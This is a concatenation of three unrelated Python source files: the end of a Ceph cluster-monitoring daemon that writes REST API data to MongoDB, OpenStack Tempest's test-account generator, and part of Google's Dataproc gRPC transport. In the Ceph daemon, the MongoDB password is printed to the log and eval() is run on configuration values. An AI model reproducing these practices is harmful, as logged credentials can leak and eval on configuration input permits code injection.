osddb["df"] = osdori["df"]
except:
pass
db.osd.update({'_id': osddb["_id"]}, osddb, upsert=True)
pools = osd_dump['output']['pools']
for pool in pools:
p = pool.copy()
p["_id"] = pool["pool"]
del p["pool"]
if p['auid']:
p['auid'] = str(p['auid'])
db.pools.update({'_id': p["_id"]}, p, upsert=True)
for osd in lost_osd:
db.osd.update({'_id': osd}, {"$set": {"lost": True}})
# osd host from conf : "host" : DBRef( "hosts", hostmap[i]),
# "partition" : DBRef( "partitions", hostmap[i]+":/dev/sdc1"),
# uri : /api/v0.1/pg/dump.json
def process_pg_dump(restapi, ceph_rest_api_subfolder, db):
if not isLeader :
return
print str(datetime.datetime.now()), "-- Process PGDump"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder+"/api/v0.1/pg/dump.json")
r1 = restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (PGDump) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(datetime.datetime.now()), "-- error (PGDump) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
else:
data1 = r1.read()
restapi.close()
pgdump = json.loads(data1)
for pg in pgdump["output"]["pg_stats"]:
# db.pg.insert(pg)
pg['_id'] = pg['pgid']
del pg['pgid']
pg['pool'] = DBRef('pools', int(pg['_id'].partition('.')[0]))
ups = pg['up']
pg['up'] = [DBRef('osd', i_osd) for i_osd in ups]
actings = pg['acting']
pg['acting'] = [DBRef('osd', i_osd) for i_osd in actings]
# Rename keys containing '.' in stat_cat_sum
# replace '.' by '_'
if 'stat_cat_sum' in pg:
scs = pg['stat_cat_sum']
else:
scs = pg['stat_sum']
for key in scs:
try:
idx = key.index('.')
value = scs[key]
del scs[key]
scs[key.replace('.', '_')] = value
except:
pass
db.pg.update({'_id' : pg["_id"]}, pg, upsert= True)
# uri : /api/v0.1/osd/crush/dump.json
def process_crushmap(restapi, ceph_rest_api_subfolder, db):
if not isLeader :
return
print str(datetime.datetime.now()), "-- Process Crushmap"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder+"/api/v0.1/osd/crush/dump.json")
r1=restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (Crushmap) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(datetime.datetime.now()), "-- error (Crushmap) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
else:
data1 = r1.read()
restapi.close()
crush_dump = json.loads(data1)
# types
types = crush_dump['output']['types']
types_ref = []
for t in types :
db.types.update({'_id': t["name"]}, {"_id": t["name"], "num": t["type_id"]}, upsert=True)
types_ref.append(DBRef("types", t["name"]))
# nodes
nodes_ref = []
devices = crush_dump['output']['devices']
for d in devices:
db.nodes.update({'_id': d["id"]}, {"_id": d["id"], "name": d["name"], "type": DBRef("types", "osd")}, upsert=True)
nodes_ref.append(DBRef("nodes", d["id"]))
buckets = crush_dump['output']['buckets']
for b in buckets:
nod = {"_id": b["id"],
"name": b["name"],
"weight": b["weight"],
"type": DBRef("types", b["type_name"]),
"hash": b["hash"],
"alg": b["alg"],
"items": [{"item": DBRef("nodes", i["id"]), "weight": i["weight"], "pos": i["pos"]} for i in b["items"]]
}
db.nodes.update({'_id' :nod["_id"]}, nod, upsert=True)
nodes_ref.append(DBRef("nodes", nod["_id"]))
# rules
rules_ref = []
rules = crush_dump['output']['rules']
for r in rules:
steps = []
for s in r["steps"]:
st = {"op": s["op"]}
if s.has_key("item"):
st["item"] = DBRef("nodes", s["item"])
if s.has_key("num"):
st["num"] = s["num"]
if s.has_key("type"):
st["type"] = DBRef("types", s["type"])
steps.append(st)
rul = {"_id": r["rule_id"],
"name": r["rule_name"],
"ruleset": r["ruleset"],
"type": r["type"],
"min_size": r["min_size"],
"max_size": r["max_size"],
"steps": steps
}
db.rules.update({'_id': rul["_id"]}, rul, upsert=True)
rules_ref.append(DBRef("rules", rul["_id"]))
tunables = crush_dump['output']['tunables']
crushmap = {"_id": fsid,
"types": types_ref,
"nodes": nodes_ref,
"rules": rules_ref,
"tunables": tunables
}
db.crushmap.update({'_id': crushmap["_id"]}, crushmap, upsert=True)
# uri : /api/v0.1/df
def process_df(restapi, ceph_rest_api_subfolder, db):
if not isLeader :
return
print str(datetime.datetime.now()), "-- Process DF"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder+"/api/v0.1/df.json")
r1=restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (DF) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(datetime.datetime.now()), "-- error (DF) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
else:
data1 = r1.read()
restapi.close()
df = json.loads(data1)
# cluster stat
clusterdf = df['output']['stats']
stats = clusterdf.copy()
stats["timestamp"] = int(round(time.time() * 1000))
stats["cluster"] = DBRef("cluster", fsid)
statsid = db.clusterstat.insert(stats)
db.cluster.update({'_id': fsid}, {"$set": {"df": DBRef("clusterstat", statsid)}})
# pool stat
pooldf = df['output']['pools']
for pdf in pooldf:
pstats = pdf["stats"].copy()
pstats["timestamp"] = int(round(time.time() * 1000))
pstats["pool"] = DBRef("pools", pdf["id"])
statsid = db.poolstat.insert(pstats)
db.pools.update({'_id': pdf["id"]}, {"$set": {"df": DBRef("poolstat", statsid)}})
# delete the oldest stats
def drop_stat(db, collection, window):
if not isLeader :
return
before = int((time.time() - window) * 1000)
print str(datetime.datetime.now()), "-- drop Stats :", collection, "before", before
db[collection].remove({"timestamp": {"$lt": before}})
def heart_beat(hostname, db):
beat = {"timestamp": int(round(time.time() * 1000)), }
db.cephprobe.update({'_id': hostname}, {"$set": beat}, upsert=True)
# leadership
leadership(db, hostname)
def ensure_dir(f):
d = os.path.dirname(f)
if not os.path.exists(d):
os.makedirs(d)
def get_local_mon_id(hostname, db):
monid = None
try :
monid = db.mon.find_one({"host.$id":hostname})["_id"]
except :
pass
return monid
class Repeater(Thread):
def __init__(self, event, function, args=[], period=5.0):
Thread.__init__(self)
self.stopped = event
self.period = period
self.function = function
self.args = args
def run(self):
while not self.stopped.wait(self.period):
try:
# call a function
self.function(*self.args)
except Exception, e:
# try later
try:
print str(datetime.datetime.now()), "-- WARNING : "+self.function.__name__ + " did not work : ", e
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
pass
except:
pass
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
evt = Event()
def handler(signum, frame):
print 'Signal handler called with signal', signum
evt.set()
class CephProbeDaemon(Daemon):
def __init__(self, pidfile):
Daemon.__init__(self, pidfile, stdout=logfile, stderr=logfile)
def run(self):
self.start_probe()
@staticmethod
def start_probe():
print str(datetime.datetime.now()), "-- CephProbe loading"
# load conf
conf = load_conf()
global clusterName
global fsid
global ceph_version
global isLeader
global hb_refresh
ceph_version = get_ceph_version()
isLeader = False
clusterName = conf.get("cluster", "ceph")
print "clusterName = ", clusterName
print "ceph_version = ", ceph_version
ceph_version_major = ceph_version.split('.')[0]
ceph_conf_file = conf.get("ceph_conf", "/etc/ceph/ceph.conf")
print "ceph_conf = ", ceph_conf_file
ceph_rest_api = conf.get("ceph_rest_api", '127.0.0.1:5000')
print "ceph_rest_api = ", ceph_rest_api
ceph_rest_api_subfolder = conf.get("ceph_rest_api_subfolder", '')
if ceph_rest_api_subfolder!= '' and not ceph_rest_api_subfolder.startswith('/'):
ceph_rest_api_subfolder = '/' + ceph_rest_api_subfolder
print "ceph_rest_api_subfolder = ", ceph_rest_api_subfolder
fsid = ceph_conf_global(ceph_conf_file, 'fsid')
print "fsid = ", fsid
hb_refresh = conf.get("hb_refresh", 5)
print "hb_refresh = ", hb_refresh
status_refresh = conf.get("status_refresh", 3)
print "status_refresh = ", status_refresh
osd_dump_refresh = conf.get("osd_dump_refresh", 3)
print "osd_dump_refresh = ", osd_dump_refresh
pg_dump_refresh = conf.get("pg_dump_refresh", 60)
print "pg_dump_refresh = ", pg_dump_refresh
crushmap_refresh = conf.get("crushmap_refresh", 60)
print "crushmap_refresh = ", crushmap_refresh
df_refresh = conf.get("df_refresh", 60)
print "df_refresh = ", df_refresh
cluster_window = conf.get("cluster_window", 1200)
print "cluster_window = ", cluster_window
osd_window = conf.get("osd_window", 1200)
print "osd_window = ", osd_window
pool_window = conf.get("pool_window", 1200)
print "pool_window = ", pool_window
mongodb_host = conf.get("mongodb_host", None)
print "mongodb_host = ", mongodb_host
mongodb_port = conf.get("mongodb_port", None)
print "mongodb_port = ", mongodb_port
is_mongo_replicat = conf.get("is_mongo_replicat", 0)
print "is_mongo_replicat = ", is_mongo_replicat
mongodb_set = "'"+conf.get("mongodb_set", "")+"'"
print "mongodb_set = ", mongodb_set
mongodb_replicaSet =conf.get("mongodb_replicaSet", None)
print "mongodb_replicaSet = ",mongodb_replicaSet
mongodb_read_preference = conf.get("mongodb_read_preference", None)
print "mongodb_read_preference = ", mongodb_read_preference
is_mongo_authenticate = conf.get("is_mongo_authenticate", 0)
print "is_mongo_authenticate",is_mongo_authenticate
mongodb_user = conf.get("mongodb_user", "cephdefault")
print "mongodb_user = ", mongodb_user
mongodb_passwd = conf.get("mongodb_passwd", None)
print "mongodb_passwd = ", mongodb_passwd
sys.stdout.flush()
# end conf extraction
#hostname = socket.gethostname() #platform.node()
hostname = socket.getfqdn()
# take care with mongo set and authentication
if is_mongo_replicat == 1:
print "replicat set connexion"
client = MongoReplicaSetClient(eval(mongodb_set), replicaSet=mongodb_replicaSet, read_preference=eval(mongodb_read_preference))
else:
print "no replicat set"
client = MongoClient(mongodb_host, mongodb_port)
db = client[fsid]
if is_mongo_authenticate == 1:
print "authentication to database"
db.authenticate(mongodb_user, mongodb_passwd)
else:
print "no authentication"
sys.stdout.flush()
restapi = httplib.HTTPConnection(ceph_rest_api)
init_cluster(restapi, ceph_rest_api_subfolder, db, hostname)
db.cephprobe.update({'_id': hostname}, {"$set": conf}, upsert=True)
conf["_id"] = hostname
#db.cephprobe.remove({'_id': hostname})
#db.cephprobe.insert(conf)
hb_thread = None
if hb_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
hb_thread = Repeater(evt, heart_beat, [hostname, db], hb_refresh)
hb_thread.start()
status_thread = None
if status_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
status_thread = Repeater(evt, process_status, [restapi, ceph_rest_api_subfolder, db], status_refresh)
status_thread.start()
osd_dump_thread = None
if osd_dump_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
osd_dump_thread = Repeater(evt, process_osd_dump, [restapi, ceph_rest_api_subfolder, db], osd_dump_refresh)
osd_dump_thread.start()
# take same parameters than osd_dump
osd_df_thread = None
if osd_dump_refresh > 0 and ceph_version_major>=12: # Luminous
restapi = httplib.HTTPConnection(ceph_rest_api)
osd_df_thread = Repeater(evt, process_osd_df, [restapi, ceph_rest_api_subfolder, db], osd_dump_refresh)
osd_df_thread.start()
pg_dump_thread = None
if pg_dump_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
pg_dump_thread = Repeater(evt, process_pg_dump, [restapi, ceph_rest_api_subfolder, db], pg_dump_refresh)
pg_dump_thread.start()
crushmap_thread = None
if crushmap_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
crushmap_thread = Repeater(evt, process_crushmap, [restapi, ceph_rest_api_subfolder, db], crushmap_refresh)
crushmap_thread.start()
df_thread = None
if df_refresh > 0:
restapi = httplib.HTTPConnection(ceph_rest_api)
df_thread = Repeater(evt, process_df, [restapi, ceph_rest_api_subfolder, db], df_refresh)
df_thread.start()
# drop threads : osdstat, poolstat, clusterstat, osddf
cluster_db_drop_thread = None
if cluster_window > 0:
cluster_db_drop_thread = Repeater(evt, drop_stat, [db, "clusterstat", cluster_window], cluster_window)
cluster_db_drop_thread.start()
osd_db_drop_thread = None
if osd_window > 0:
osd_db_drop_thread = Repeater(evt, drop_stat, [db, "osdstat", osd_window], osd_window)
osd_db_drop_thread.start()
pool_db_drop_thread = None
if pool_window > 0:
pool_db_drop_thread = Repeater(evt, drop_stat, [db, "poolstat", pool_window], pool_window)
pool_db_drop_thread.start()
osddf_db_drop_thread = None
if osd_window > 0:
osddf_db_drop_thread = Repeater(evt, drop_stat, [db, "osddf", osd_window], osd_window)
osddf_db_drop_thread.start()
signal.signal(signal.SIGTERM, handler)
while not evt.isSet():
evt.wait(600)
print str(datetime.datetime.now()), "-- CephProbe stopped"
sys.stdout.flush()
if __name__ == "__main__":
ensure_dir(logfile)
ensure_dir(runfile)
daemon = CephProbeDaemon(runfile)
if len(sys.argv) == 2:
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'status' == sys.argv[1]:
daemon.status()
elif 'restart' == sys.argv[1]:
daemon.restart()
elif 'nodaemon' == sys.argv[1]:
CephProbeDaemon.start_probe()
else:
print "Unknown command"
sys.exit(2)
sys.exit(0)
else:
print "usage: %s start|stop|restart|status|nodaemon" % sys.argv[0]
sys.exit(2)
|
|
#!/usr/bin/env python
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility for creating **accounts.yaml** file for concurrent test runs.
Creates one primary user, one alt user, one swift admin, one stack owner
and one admin (optionally) for each concurrent thread. The utility creates
user for each tenant. The **accounts.yaml** file will be valid and contain
credentials for created users, so each user will be in separate tenant and
have the username, tenant_name, password and roles.
**Usage:** ``tempest account-generator [-h] [OPTIONS] accounts_file.yaml``.
Positional Arguments
--------------------
**accounts_file.yaml** (Required) Provide an output accounts yaml file. Utility
creates a .yaml file in the directory where the command is ran. The appropriate
name for the file is *accounts.yaml* and it should be placed in *tempest/etc*
directory.
Authentication
--------------
Account generator creates users and tenants so it needs the admin credentials
of your cloud to operate properly. The corresponding info can be given either
through CLI options or environment variables.
You're probably familiar with these, but just to remind:
======== ======================== ====================
Param CLI Environment Variable
======== ======================== ====================
Username --os-username OS_USERNAME
Password --os-password OS_PASSWORD
Project --os-project-name OS_PROJECT_NAME
Tenant --os-tenant-name (depr.) OS_TENANT_NAME
Domain --os-domain-name OS_DOMAIN_NAME
======== ======================== ====================
Optional Arguments
------------------
**-h**, **--help** (Optional) Shows help message with the description of
utility and its arguments, and exits.
**c /etc/tempest.conf**, **--config-file /etc/tempest.conf** (Optional) Path to
tempest config file.
**--os-username <auth-user-name>** (Optional) Name used for authentication with
the OpenStack Identity service. Defaults to env[OS_USERNAME]. Note: User should
have permissions to create new user accounts and tenants.
**--os-password <auth-password>** (Optional) Password used for authentication
with the OpenStack Identity service. Defaults to env[OS_PASSWORD].
**--os-project-name <auth-project-name>** (Optional) Project to request
authorization on. Defaults to env[OS_PROJECT_NAME].
**--os-tenant-name <auth-tenant-name>** (Optional, deprecated) Tenant to
request authorization on. Defaults to env[OS_TENANT_NAME].
**--os-domain-name <auth-domain-name>** (Optional) Domain the user and project
belong to. Defaults to env[OS_DOMAIN_NAME].
**--tag TAG** (Optional) Resources tag. Each created resource (user, project)
will have the prefix with the given TAG in its name. Using tag is recommended
for the further using, cleaning resources.
**-r CONCURRENCY**, **--concurrency CONCURRENCY** (Required) Concurrency count
(default: 1). The number of accounts required can be estimated as
CONCURRENCY x 2. Each user provided in *accounts.yaml* file will be in
a different tenant. This is required to provide isolation between test for
running in parallel.
**--with-admin** (Optional) Creates admin for each concurrent group
(default: False).
**-i VERSION**, **--identity-version VERSION** (Optional) Provisions accounts
using the specified version of the identity API. (default: '3').
To see help on specific argument, please do: ``tempest account-generator
[OPTIONS] <accounts_file.yaml> -h``.
"""
import argparse
import os
import traceback
from cliff import command
from oslo_log import log as logging
import yaml
from tempest.common import credentials_factory
from tempest.common import dynamic_creds
from tempest import config
LOG = None
CONF = config.CONF
DESCRIPTION = ('Create accounts.yaml file for concurrent test runs.%s'
'One primary user, one alt user, '
'one swift admin, one stack owner '
'and one admin (optionally) will be created '
'for each concurrent thread.' % os.linesep)
def setup_logging():
global LOG
logging.setup(CONF, __name__)
LOG = logging.getLogger(__name__)
def get_credential_provider(opts):
identity_version = "".join(['v', str(opts.identity_version)])
# NOTE(andreaf) For now tempest.conf controls whether resources will
# actually be created. Once we remove the dependency from tempest.conf
# we will need extra CLI option(s) to control this.
network_resources = {'router': True,
'network': True,
'subnet': True,
'dhcp': True}
admin_creds_dict = {'username': opts.os_username,
'password': opts.os_password}
_project_name = opts.os_project_name or opts.os_tenant_name
if opts.identity_version == 3:
admin_creds_dict['project_name'] = _project_name
admin_creds_dict['domain_name'] = opts.os_domain_name or 'Default'
elif opts.identity_version == 2:
admin_creds_dict['tenant_name'] = _project_name
admin_creds = credentials_factory.get_credentials(
fill_in=False, identity_version=identity_version, **admin_creds_dict)
return dynamic_creds.DynamicCredentialProvider(
identity_version=identity_version,
name=opts.tag,
network_resources=network_resources,
neutron_available=CONF.service_available.neutron,
create_networks=CONF.auth.create_isolated_networks,
identity_admin_role=CONF.identity.admin_role,
identity_admin_domain_scope=CONF.identity.admin_domain_scope,
project_network_cidr=CONF.network.project_network_cidr,
project_network_mask_bits=CONF.network.project_network_mask_bits,
public_network_id=CONF.network.public_network_id,
admin_creds=admin_creds,
**credentials_factory.get_dynamic_provider_params())
def generate_resources(cred_provider, admin):
# Create the list of resources to be provisioned for each process
# NOTE(andreaf) get_credentials expects a string for types or a list for
# roles. Adding all required inputs to the spec list.
spec = ['primary', 'alt']
if CONF.service_available.swift:
spec.append([CONF.object_storage.operator_role])
spec.append([CONF.object_storage.reseller_admin_role])
if CONF.service_available.heat:
spec.append([CONF.orchestration.stack_owner_role,
CONF.object_storage.operator_role])
if admin:
spec.append('admin')
resources = []
for cred_type in spec:
resources.append((cred_type, cred_provider.get_credentials(
credential_type=cred_type)))
return resources
def dump_accounts(resources, identity_version, account_file):
accounts = []
for resource in resources:
cred_type, test_resource = resource
account = {
'username': test_resource.username,
'password': test_resource.password
}
if identity_version == 3:
account['project_name'] = test_resource.project_name
account['domain_name'] = test_resource.domain_name
else:
account['project_name'] = test_resource.tenant_name
# If the spec includes 'admin' credentials are defined via type,
# else they are defined via list of roles.
if cred_type == 'admin':
account['types'] = [cred_type]
elif cred_type not in ['primary', 'alt']:
account['roles'] = cred_type
if test_resource.network:
account['resources'] = {}
if test_resource.network:
account['resources']['network'] = test_resource.network['name']
accounts.append(account)
if os.path.exists(account_file):
os.rename(account_file, '.'.join((account_file, 'bak')))
with open(account_file, 'w') as f:
yaml.safe_dump(accounts, f, default_flow_style=False)
LOG.info('%s generated successfully!' % account_file)
def _parser_add_args(parser):
parser.add_argument('-c', '--config-file',
metavar='/etc/tempest.conf',
help='path to tempest config file')
parser.add_argument('--os-username',
metavar='<auth-user-name>',
default=os.environ.get('OS_USERNAME'),
help='User should have permissions '
'to create new user accounts and '
'tenants. Defaults to env[OS_USERNAME].')
parser.add_argument('--os-password',
metavar='<auth-password>',
default=os.environ.get('OS_PASSWORD'),
help='Defaults to env[OS_PASSWORD].')
parser.add_argument('--os-project-name',
metavar='<auth-project-name>',
default=os.environ.get('OS_PROJECT_NAME'),
help='Defaults to env[OS_PROJECT_NAME].')
parser.add_argument('--os-tenant-name',
metavar='<auth-tenant-name>',
default=os.environ.get('OS_TENANT_NAME'),
help='Defaults to env[OS_TENANT_NAME].')
parser.add_argument('--os-domain-name',
metavar='<auth-domain-name>',
default=os.environ.get('OS_DOMAIN_NAME'),
help='Defaults to env[OS_DOMAIN_NAME].')
parser.add_argument('--tag',
default='',
required=False,
dest='tag',
help='Resources tag')
parser.add_argument('-r', '--concurrency',
default=1,
type=int,
required=False,
dest='concurrency',
help='Concurrency count')
parser.add_argument('--with-admin',
action='store_true',
dest='admin',
help='Creates admin for each concurrent group')
parser.add_argument('-i', '--identity-version',
default=3,
choices=[2, 3],
type=int,
required=False,
dest='identity_version',
help='Version of the Identity API to use')
parser.add_argument('accounts',
metavar='accounts_file.yaml',
help='Output accounts yaml file')
def get_options():
usage_string = ('tempest account-generator [-h] <ARG> ...\n\n'
'To see help on specific argument, do:\n'
'tempest account-generator <ARG> -h')
parser = argparse.ArgumentParser(
description=DESCRIPTION,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
usage=usage_string
)
_parser_add_args(parser)
opts = parser.parse_args()
return opts
class TempestAccountGenerator(command.Command):
def get_parser(self, prog_name):
parser = super(TempestAccountGenerator, self).get_parser(prog_name)
_parser_add_args(parser)
return parser
def take_action(self, parsed_args):
try:
main(parsed_args)
except Exception:
LOG.exception("Failure generating test accounts.")
traceback.print_exc()
raise
def get_description(self):
return DESCRIPTION
def main(opts=None):
setup_logging()
if not opts:
LOG.warning("Use of: 'tempest-account-generator' is deprecated, "
"please use: 'tempest account-generator'")
opts = get_options()
if opts.config_file:
config.CONF.set_config_path(opts.config_file)
if opts.os_tenant_name:
LOG.warning("'os-tenant-name' and 'OS_TENANT_NAME' are both "
"deprecated, please use 'os-project-name' or "
"'OS_PROJECT_NAME' instead")
resources = []
for count in range(opts.concurrency):
# Use N different cred_providers to obtain different sets of creds
cred_provider = get_credential_provider(opts)
resources.extend(generate_resources(cred_provider, opts.admin))
dump_accounts(resources, opts.identity_version, opts.accounts)
if __name__ == "__main__":
main()
|
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import grpc_helpers
from google.api_core import operations_v1
from google.api_core import gapic_v1
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.cloud.dataproc_v1.types import clusters
from google.longrunning import operations_pb2 # type: ignore
from .base import ClusterControllerTransport, DEFAULT_CLIENT_INFO
class ClusterControllerGrpcTransport(ClusterControllerTransport):
"""gRPC backend transport for ClusterController.
The ClusterControllerService provides methods to manage
clusters of Compute Engine instances.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_stubs: Dict[str, Callable]
def __init__(
self,
*,
host: str = "dataproc.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client: Optional[operations_v1.OperationsClient] = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
# use the credentials which are saved
credentials=self._credentials,
# Set ``credentials_file`` to ``None`` here as
# the credentials that we saved earlier should be used.
credentials_file=None,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@classmethod
def create_channel(
cls,
host: str = "dataproc.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
Raises:
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Quick check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsClient(self.grpc_channel)
# Return the client from cache.
return self._operations_client
@property
def create_cluster(
self,
) -> Callable[[clusters.CreateClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the create cluster method over gRPC.
Creates a cluster in a project. The returned
[Operation.metadata][google.longrunning.Operation.metadata] will
be
`ClusterOperationMetadata <https://cloud.google.com/dataproc/docs/reference/rpc/google.cloud.dataproc.v1#clusteroperationmetadata>`__.
Returns:
Callable[[~.CreateClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "create_cluster" not in self._stubs:
self._stubs["create_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/CreateCluster",
request_serializer=clusters.CreateClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["create_cluster"]
@property
def update_cluster(
self,
) -> Callable[[clusters.UpdateClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the update cluster method over gRPC.
Updates a cluster in a project. The returned
[Operation.metadata][google.longrunning.Operation.metadata] will
be
